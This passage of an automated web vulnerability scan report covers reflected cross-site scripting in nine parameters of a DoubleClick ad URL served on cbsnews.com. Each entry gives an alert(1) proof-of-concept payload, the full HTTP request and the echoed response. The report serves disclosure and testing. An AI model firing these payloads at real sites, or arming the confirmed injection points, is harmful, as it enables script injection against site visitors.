The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 187a9"-alert(1)-"5e0ae5f8a64 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com187a9"-alert(1)-"5e0ae5f8a64&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
bs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com187a9"-alert(1)-"5e0ae5f8a64&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-
...[SNIP]...

3.101. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77abb"-alert(1)-"9e34f2ad84d was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=277abb"-alert(1)-"9e34f2ad84d&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=277abb"-alert(1)-"9e34f2ad84d&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=
...[SNIP]...

3.102. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abcf"-alert(1)-"07297bb7caf was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com3abcf"-alert(1)-"07297bb7caf&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
g/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com3abcf"-alert(1)-"07297bb7caf&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same
...[SNIP]...

3.103. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eb5f"-alert(1)-"0a4a4487f8 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039462327604510206412523eb5f"-alert(1)-"0a4a4487f8&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5760

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039462327604510206412523eb5f"-alert(1)-"0a4a4487f8&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fa
...[SNIP]...

3.104. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902bf"-alert(1)-"e7b97166ecf was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=902bf"-alert(1)-"e7b97166ecf&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
48298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=902bf"-alert(1)-"e7b97166ecf&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.
...[SNIP]...

3.105. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 721eb"-alert(1)-"5e3375eee1a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100721eb"-alert(1)-"5e3375eee1a&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100721eb"-alert(1)-"5e3375eee1a&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=5
...[SNIP]...

3.106. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82d00"-alert(1)-"a0d2f28156c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=82d00"-alert(1)-"a0d2f28156c&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=82d00"-alert(1)-"a0d2f28156c&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "op
...[SNIP]...

3.107. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44562"-alert(1)-"289e63f792d was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=200044562"-alert(1)-"289e63f792d&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=200044562"-alert(1)-"289e63f792d&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=20
...[SNIP]...

3.108. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc8ee"-alert(1)-"db20965c259 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243cc8ee"-alert(1)-"db20965c259&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243cc8ee"-alert(1)-"db20965c259&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "
...[SNIP]...

3.109. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac86f"-alert(1)-"e9cbd23bb73 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985Eac86f"-alert(1)-"e9cbd23bb73&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985Eac86f"-alert(1)-"e9cbd23bb73&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpr
...[SNIP]...

